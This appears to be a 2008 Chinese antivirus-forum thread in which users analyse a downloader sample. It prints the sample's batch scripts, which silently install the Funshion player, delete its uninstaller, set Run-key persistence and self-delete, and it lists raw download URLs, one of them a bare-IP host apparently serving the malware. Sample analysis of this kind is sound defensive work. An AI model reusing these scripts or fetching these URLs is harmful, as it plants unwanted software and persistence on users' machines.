下载者 谁去抓一下吧

九尾野狐

前天的样本了 不用扫了

我是让你们把图里下载地址里的东西抓出来

雨宫优子

我输入Virus不行啊..

看来我是习惯输入大写字母了..

08红伞威点

原帖由 没注册 于 2008-10-12 16:41 发表
默认的virus密码你们这些经常在样本区混的都不知道？

谢谢！习惯了不设蜜，抱歉！

解压红伞监控杀。

雨宫优子

抓到一个..

不知道怎么的刚才没抓到



还有一个风行网络电影的安装包，太大了，不放上来了..

醉一生爱妍

dfDelmlljy.bat 作用貌似是测网络是否联通

:try
del "C:\Documents and Settings\Administrator\Local Settings\Temp\456456.exe"
ping 127.0.0.1 >nul
if exist "C:\Documents and Settings\Administrator\Local Settings\Temp\456456.exe" goto try
del %0

0.bat的内容 。。

@echo off
ping -n 3 127.1>nul
taskkill /f /im FunshionInstall_C7661.exe
taskkill /f /im Funshion.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Funshion" /f
"C:\Documents and Settings\Administrator\Local Settings\Temp\FunshionInstall_C7661.exe" /S
ping -n 2 127.1>nul
del /q /f "%userprofile%\桌面\风行网络电影.lnk"
del /q /f "%ALLUSERSPROFILE%\桌面\风行网络电影.lnk"
del /q /f "%ALLUSERSPROFILE%\「开始」菜单\程序\风行\卸载 风行网络电影.lnk"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Funshion /t reg_sz /d  "%ProgramFiles%\Funshion Online\Funshion\Funshion.exe /tray" /f
ping -n 1 127.1>nul
taskkill /f /im SysOptimize.exe
del /q /f "%ProgramFiles%\Funshion Online\Funshion\Uninstall.exe"
ping -n 3 127.1>nul
start "" "%ProgramFiles%\Funshion Online\Funshion\Funshion.exe" /tray
ping -n 10 127.1>nul
del /q /f "C:\Documents and Settings\Administrator\Local Settings\Temp\FunshionInstall_C7661.exe"
DEL "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0.bat"
CLS
EXIT

怪了 我这里也没下载

醉一生爱妍

估计下的就是那个风行吧

雨宫优子

456456里的东西好像和楼主的差不多..

估计就是只是下了风行...

风行怎么那么流氓啊？还是有人想栽赃？

liu5678

我汗。。。~~~刚刚解压出来就被NIS2009干掉了~~直接成了空白~~~

雨宫优子

对了，那个行为分析似乎还有点问题

我这里看到似乎还释放了Beep.sys..

另外我有点不清楚的是，他怎么还会释放一个CMD程序tmpzydf0.exe...

还是有微软签名的..

[ 本帖最后由 aarwwefdds 于 2008-10-12 17:18 编辑 ]

qianwenxiang

http://60.173.12.131:8989/456456.exe
http://60.173.12.131:8989/vmde.htm
http://60.173.12.131:8989/web20095664.htm
http://down6.flashget.com/unmini/fgmun_14756_3.exe
http://neirong.funshion.com/down ... onInstall_C7661.exe